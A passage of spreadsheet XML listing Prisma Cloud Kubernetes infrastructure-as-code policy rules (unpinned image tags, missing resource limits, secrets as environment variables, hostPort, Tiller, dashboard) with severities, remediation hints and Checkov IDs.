      <c r="AD1215" t="b">
        <v>1</v>
      </c>
      <c r="AE1215" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1215" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG12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5" t="inlineStr">
        <is>
          <t>367ae3af-e9f6-4c76-a72b-021dfac4e38d</t>
        </is>
      </c>
      <c r="AI1215" t="inlineStr"/>
      <c r="AJ1215" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1215" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1216">
      <c r="A1216" t="inlineStr"/>
      <c r="B1216" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1216" s="2" t="inlineStr"/>
      <c r="D1216" t="inlineStr"/>
      <c r="E1216" t="inlineStr"/>
      <c r="F1216" t="inlineStr"/>
      <c r="G1216" t="b">
        <v>1</v>
      </c>
      <c r="H12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6" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1216" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers,initContainers</t>
        </is>
      </c>
      <c r="K1216" t="inlineStr">
        <is>
          <t>Image tag is not set to Fixed</t>
        </is>
      </c>
      <c r="L1216" t="inlineStr"/>
      <c r="M1216" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1216" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1216" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1216" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1216" t="inlineStr"/>
      <c r="R1216" t="inlineStr"/>
      <c r="S1216" t="inlineStr"/>
      <c r="T1216" t="b">
        <v>0</v>
      </c>
      <c r="U1216" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1216" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers,initContainers</t>
        </is>
      </c>
      <c r="W1216" t="inlineStr">
        <is>
          <t>Image Tag should be fixed - not latest or blank</t>
        </is>
      </c>
      <c r="X1216" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-13</t>
        </is>
      </c>
      <c r="Y1216" t="inlineStr"/>
      <c r="Z1216" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["containers","initContainers"]}</t>
        </is>
      </c>
      <c r="AA1216" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1216" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1216" t="inlineStr">
        <is>
          <t>CKV_K8S_14</t>
        </is>
      </c>
      <c r="AD1216" t="b">
        <v>1</v>
      </c>
      <c r="AE1216" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1216" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG12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6" t="inlineStr">
        <is>
          <t>9e743d41-478b-460d-b1e2-eb54bb92fe17</t>
        </is>
      </c>
      <c r="AI1216" t="inlineStr"/>
      <c r="AJ1216" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1216" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1217">
      <c r="A1217" t="inlineStr"/>
      <c r="B1217" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1217" s="2" t="inlineStr"/>
      <c r="D1217" t="inlineStr"/>
      <c r="E1217" t="inlineStr"/>
      <c r="F1217" t="inlineStr"/>
      <c r="G1217" t="b">
        <v>1</v>
      </c>
      <c r="H12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7" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1217" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers,initContainers</t>
        </is>
      </c>
      <c r="K1217" t="inlineStr">
        <is>
          <t>securityContext is not applied to pods and containers in container context</t>
        </is>
      </c>
      <c r="L1217" t="inlineStr"/>
      <c r="M1217" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1217" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1217" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1217" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1217" t="inlineStr"/>
      <c r="R1217" t="inlineStr"/>
      <c r="S1217" t="inlineStr"/>
      <c r="T1217" t="b">
        <v>0</v>
      </c>
      <c r="U1217" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1217" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers,initContainers</t>
        </is>
      </c>
      <c r="W1217" t="inlineStr">
        <is>
          <t>Apply security context to your pods and containers</t>
        </is>
      </c>
      <c r="X1217" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-28</t>
        </is>
      </c>
      <c r="Y1217" t="inlineStr"/>
      <c r="Z1217" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["containers","initContainers"]}</t>
        </is>
      </c>
      <c r="AA1217" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1217" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1217" t="inlineStr">
        <is>
          <t>CKV_K8S_30</t>
        </is>
      </c>
      <c r="AD1217" t="b">
        <v>1</v>
      </c>
      <c r="AE1217" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1217" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG12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7" t="inlineStr">
        <is>
          <t>9fe4c2a9-e01d-4030-8900-1f1f2cab722f</t>
        </is>
      </c>
      <c r="AI1217" t="inlineStr"/>
      <c r="AJ1217" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1217" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1218">
      <c r="A1218" t="inlineStr"/>
      <c r="B1218" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1218" s="2" t="inlineStr"/>
      <c r="D1218" t="inlineStr"/>
      <c r="E1218" t="inlineStr"/>
      <c r="F1218" t="inlineStr"/>
      <c r="G1218" t="b">
        <v>1</v>
      </c>
      <c r="H12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8" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1218" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers,initContainers</t>
        </is>
      </c>
      <c r="K1218" t="inlineStr">
        <is>
          <t>Secrets used as environment variables</t>
        </is>
      </c>
      <c r="L1218" t="inlineStr"/>
      <c r="M1218" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1218" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1218" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1218" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1218" t="inlineStr"/>
      <c r="R1218" t="inlineStr"/>
      <c r="S1218" t="inlineStr"/>
      <c r="T1218" t="b">
        <v>0</v>
      </c>
      <c r="U1218" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1218" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers,initContainers</t>
        </is>
      </c>
      <c r="W1218" t="inlineStr">
        <is>
          <t>Prefer using secrets as files over secrets as environment variables</t>
        </is>
      </c>
      <c r="X1218" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-33</t>
        </is>
      </c>
      <c r="Y1218" t="inlineStr"/>
      <c r="Z1218" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["containers","initContainers"]}</t>
        </is>
      </c>
      <c r="AA1218" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1218" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1218" t="inlineStr">
        <is>
          <t>CKV_K8S_35</t>
        </is>
      </c>
      <c r="AD1218" t="b">
        <v>1</v>
      </c>
      <c r="AE1218" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1218" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG12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8" t="inlineStr">
        <is>
          <t>edf8a515-8e86-4931-bc82-094d5de3258f</t>
        </is>
      </c>
      <c r="AI1218" t="inlineStr"/>
      <c r="AJ1218" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1218" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1219">
      <c r="A1219" t="inlineStr"/>
      <c r="B1219" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1219" s="2" t="inlineStr"/>
      <c r="D1219" t="inlineStr"/>
      <c r="E1219" t="inlineStr"/>
      <c r="F1219" t="inlineStr"/>
      <c r="G1219" t="b">
        <v>1</v>
      </c>
      <c r="H12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19" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1219" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers,initContainers</t>
        </is>
      </c>
      <c r="K1219" t="inlineStr">
        <is>
          <t>CPU request is not set</t>
        </is>
      </c>
      <c r="L1219" t="inlineStr"/>
      <c r="M1219" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1219" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1219" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1219" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1219" t="inlineStr"/>
      <c r="R1219" t="inlineStr"/>
      <c r="S1219" t="inlineStr"/>
      <c r="T1219" t="b">
        <v>0</v>
      </c>
      <c r="U1219" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1219" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers,initContainers</t>
        </is>
      </c>
      <c r="W1219" t="inlineStr">
        <is>
          <t>CPU requests should be set</t>
        </is>
      </c>
      <c r="X1219" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-9</t>
        </is>
      </c>
      <c r="Y1219" t="inlineStr"/>
      <c r="Z1219" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["containers","initContainers"]}</t>
        </is>
      </c>
      <c r="AA1219" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1219" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1219" t="inlineStr">
        <is>
          <t>CKV_K8S_10</t>
        </is>
      </c>
      <c r="AD1219" t="b">
        <v>1</v>
      </c>
      <c r="AE1219" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1219" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG12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19" t="inlineStr">
        <is>
          <t>662c96ca-8714-4f6f-bf63-9277daafc075</t>
        </is>
      </c>
      <c r="AI1219" t="inlineStr"/>
      <c r="AJ1219" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1219" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1220">
      <c r="A1220" t="inlineStr"/>
      <c r="B1220" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1220" s="2" t="inlineStr"/>
      <c r="D1220" t="inlineStr"/>
      <c r="E1220" t="inlineStr"/>
      <c r="F1220" t="inlineStr"/>
      <c r="G1220" t="b">
        <v>1</v>
      </c>
      <c r="H12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0" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1220" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers,initContainers</t>
        </is>
      </c>
      <c r="K1220" t="inlineStr">
        <is>
          <t>Memory requests are not set</t>
        </is>
      </c>
      <c r="L1220" t="inlineStr"/>
      <c r="M1220" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1220" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1220" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1220" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1220" t="inlineStr"/>
      <c r="R1220" t="inlineStr"/>
      <c r="S1220" t="inlineStr"/>
      <c r="T1220" t="b">
        <v>0</v>
      </c>
      <c r="U1220" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1220" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers,initContainers</t>
        </is>
      </c>
      <c r="W1220" t="inlineStr">
        <is>
          <t>Memory requests should be set</t>
        </is>
      </c>
      <c r="X1220" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-11</t>
        </is>
      </c>
      <c r="Y1220" t="inlineStr"/>
      <c r="Z1220" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["containers","initContainers"]}</t>
        </is>
      </c>
      <c r="AA1220" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1220" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1220" t="inlineStr">
        <is>
          <t>CKV_K8S_12</t>
        </is>
      </c>
      <c r="AD1220" t="b">
        <v>1</v>
      </c>
      <c r="AE1220" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1220" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG12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0" t="inlineStr">
        <is>
          <t>8b8441fc-c393-47ed-b47f-ff06bfcd3e0f</t>
        </is>
      </c>
      <c r="AI1220" t="inlineStr"/>
      <c r="AJ1220" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1220" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1221">
      <c r="A1221" t="inlineStr"/>
      <c r="B1221" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1221" s="2" t="inlineStr"/>
      <c r="D1221" t="inlineStr"/>
      <c r="E1221" t="inlineStr"/>
      <c r="F1221" t="inlineStr"/>
      <c r="G1221" t="b">
        <v>1</v>
      </c>
      <c r="H12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1" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1221" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers,initContainers</t>
        </is>
      </c>
      <c r="K1221" t="inlineStr">
        <is>
          <t>Memory limits are not set</t>
        </is>
      </c>
      <c r="L1221" t="inlineStr"/>
      <c r="M1221" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1221" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1221" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1221" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1221" t="inlineStr"/>
      <c r="R1221" t="inlineStr"/>
      <c r="S1221" t="inlineStr"/>
      <c r="T1221" t="b">
        <v>0</v>
      </c>
      <c r="U1221" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1221" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers,initContainers</t>
        </is>
      </c>
      <c r="W1221" t="inlineStr">
        <is>
          <t>Memory limits should be set</t>
        </is>
      </c>
      <c r="X1221" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-12</t>
        </is>
      </c>
      <c r="Y1221" t="inlineStr"/>
      <c r="Z1221" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["containers","initContainers"]}</t>
        </is>
      </c>
      <c r="AA1221" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1221" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1221" t="inlineStr">
        <is>
          <t>CKV_K8S_13</t>
        </is>
      </c>
      <c r="AD1221" t="b">
        <v>1</v>
      </c>
      <c r="AE1221" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1221" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG12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1" t="inlineStr">
        <is>
          <t>267d86e3-7066-4e25-822d-57680e66dcb7</t>
        </is>
      </c>
      <c r="AI1221" t="inlineStr"/>
      <c r="AJ1221" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1221" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1222">
      <c r="A1222" t="inlineStr"/>
      <c r="B1222" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1222" s="2" t="inlineStr"/>
      <c r="D1222" t="inlineStr"/>
      <c r="E1222" t="inlineStr"/>
      <c r="F1222" t="inlineStr"/>
      <c r="G1222" t="b">
        <v>1</v>
      </c>
      <c r="H12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2" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1222" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers,initContainers</t>
        </is>
      </c>
      <c r="K1222" t="inlineStr">
        <is>
          <t>hostPort is specified</t>
        </is>
      </c>
      <c r="L1222" t="inlineStr"/>
      <c r="M1222" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1222" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1222" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1222" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1222" t="inlineStr"/>
      <c r="R1222" t="inlineStr"/>
      <c r="S1222" t="inlineStr"/>
      <c r="T1222" t="b">
        <v>0</v>
      </c>
      <c r="U1222" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1222" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers,initContainers</t>
        </is>
      </c>
      <c r="W1222" t="inlineStr">
        <is>
          <t>Do not specify hostPort unless absolutely necessary</t>
        </is>
      </c>
      <c r="X1222" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-25</t>
        </is>
      </c>
      <c r="Y1222" t="inlineStr"/>
      <c r="Z1222" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["containers","initContainers"]}</t>
        </is>
      </c>
      <c r="AA1222" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1222" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1222" t="inlineStr">
        <is>
          <t>CKV_K8S_26</t>
        </is>
      </c>
      <c r="AD1222" t="b">
        <v>1</v>
      </c>
      <c r="AE1222" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1222" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG12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2" t="inlineStr">
        <is>
          <t>a16803e5-83f1-4d7b-80bc-5bdfd47965a8</t>
        </is>
      </c>
      <c r="AI1222" t="inlineStr"/>
      <c r="AJ1222" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1222" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1223">
      <c r="A1223" t="inlineStr"/>
      <c r="B1223" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1223" s="2" t="inlineStr"/>
      <c r="D1223" t="inlineStr"/>
      <c r="E1223" t="inlineStr"/>
      <c r="F1223" t="inlineStr"/>
      <c r="G1223" t="b">
        <v>1</v>
      </c>
      <c r="H12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3" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1223" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers,initContainers</t>
        </is>
      </c>
      <c r="K1223" t="inlineStr">
        <is>
          <t>Read-Only filesystem for containers is not used</t>
        </is>
      </c>
      <c r="L1223" t="inlineStr"/>
      <c r="M1223" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1223" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1223" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1223" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1223" t="inlineStr"/>
      <c r="R1223" t="inlineStr"/>
      <c r="S1223" t="inlineStr"/>
      <c r="T1223" t="b">
        <v>0</v>
      </c>
      <c r="U1223" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1223" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers,initContainers</t>
        </is>
      </c>
      <c r="W1223" t="inlineStr">
        <is>
          <t>Use read-only filesystem for containers where possible</t>
        </is>
      </c>
      <c r="X1223" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-21</t>
        </is>
      </c>
      <c r="Y1223" t="inlineStr"/>
      <c r="Z1223" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["containers","initContainers"]}</t>
        </is>
      </c>
      <c r="AA1223" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1223" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1223" t="inlineStr">
        <is>
          <t>CKV_K8S_22</t>
        </is>
      </c>
      <c r="AD1223" t="b">
        <v>1</v>
      </c>
      <c r="AE1223" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1223" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG12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3" t="inlineStr">
        <is>
          <t>db181537-e359-4a4e-8baa-a6d33e3df6ad</t>
        </is>
      </c>
      <c r="AI1223" t="inlineStr"/>
      <c r="AJ1223" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1223" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1224">
      <c r="A1224" t="inlineStr"/>
      <c r="B1224" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1224" s="2" t="inlineStr"/>
      <c r="D1224" t="inlineStr"/>
      <c r="E1224" t="inlineStr"/>
      <c r="F1224" t="inlineStr"/>
      <c r="G1224" t="b">
        <v>1</v>
      </c>
      <c r="H12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4" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1224" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers,initContainers</t>
        </is>
      </c>
      <c r="K1224" t="inlineStr">
        <is>
          <t>Tiller (Helm V2) is deployed</t>
        </is>
      </c>
      <c r="L1224" t="inlineStr"/>
      <c r="M1224" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1224" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1224" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1224" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1224" t="inlineStr"/>
      <c r="R1224" t="inlineStr"/>
      <c r="S1224" t="inlineStr"/>
      <c r="T1224" t="b">
        <v>0</v>
      </c>
      <c r="U1224" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1224" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers,initContainers</t>
        </is>
      </c>
      <c r="W1224" t="inlineStr">
        <is>
          <t>Ensure that Tiller (Helm v2) is not deployed</t>
        </is>
      </c>
      <c r="X1224" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-32</t>
        </is>
      </c>
      <c r="Y1224" t="inlineStr"/>
      <c r="Z1224" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["containers","initContainers"]}</t>
        </is>
      </c>
      <c r="AA1224" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1224" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1224" t="inlineStr">
        <is>
          <t>CKV_K8S_34</t>
        </is>
      </c>
      <c r="AD1224" t="b">
        <v>1</v>
      </c>
      <c r="AE1224" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1224" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG12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4" t="inlineStr">
        <is>
          <t>33a62b66-1d80-43ce-ae26-e0d328c1b402</t>
        </is>
      </c>
      <c r="AI1224" t="inlineStr"/>
      <c r="AJ1224" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1224" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1225">
      <c r="A1225" t="inlineStr"/>
      <c r="B1225" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1225" s="2" t="inlineStr"/>
      <c r="D1225" t="inlineStr"/>
      <c r="E1225" t="inlineStr"/>
      <c r="F1225" t="inlineStr"/>
      <c r="G1225" t="b">
        <v>1</v>
      </c>
      <c r="H12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5" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1225" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers,initContainers</t>
        </is>
      </c>
      <c r="K1225" t="inlineStr">
        <is>
          <t>Kubernetes dashboard is deployed</t>
        </is>
      </c>
      <c r="L1225" t="inlineStr"/>
      <c r="M1225" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1225" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1225" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1225" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1225" t="inlineStr"/>
      <c r="R1225" t="inlineStr"/>
      <c r="S1225" t="inlineStr"/>
      <c r="T1225" t="b">
        <v>0</v>
      </c>
      <c r="U1225" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1225" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers,initContainers</t>
        </is>
      </c>
      <c r="W1225" t="inlineStr">
        <is>
          <t>Ensure the Kubernetes dashboard is not deployed</t>
        </is>
      </c>
      <c r="X1225" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-31</t>
        </is>
      </c>
      <c r="Y1225" t="inlineStr"/>
      <c r="Z1225" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["containers","initContainers"]}</t>
        </is>
      </c>
      <c r="AA1225" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1225" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1225" t="inlineStr">
        <is>
          <t>CKV_K8S_33</t>
        </is>
      </c>
      <c r="AD1225" t="b">
        <v>1</v>
      </c>
      <c r="AE1225" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1225" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG12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5" t="inlineStr">
        <is>
          <t>e45f89a2-eb9f-4c9e-80d2-feb559094c3a</t>
        </is>
      </c>
      <c r="AI1225" t="inlineStr"/>
      <c r="AJ1225" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1225" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1226">
      <c r="A1226" t="inlineStr"/>
      <c r="B1226" s="2" t="inlineStr">
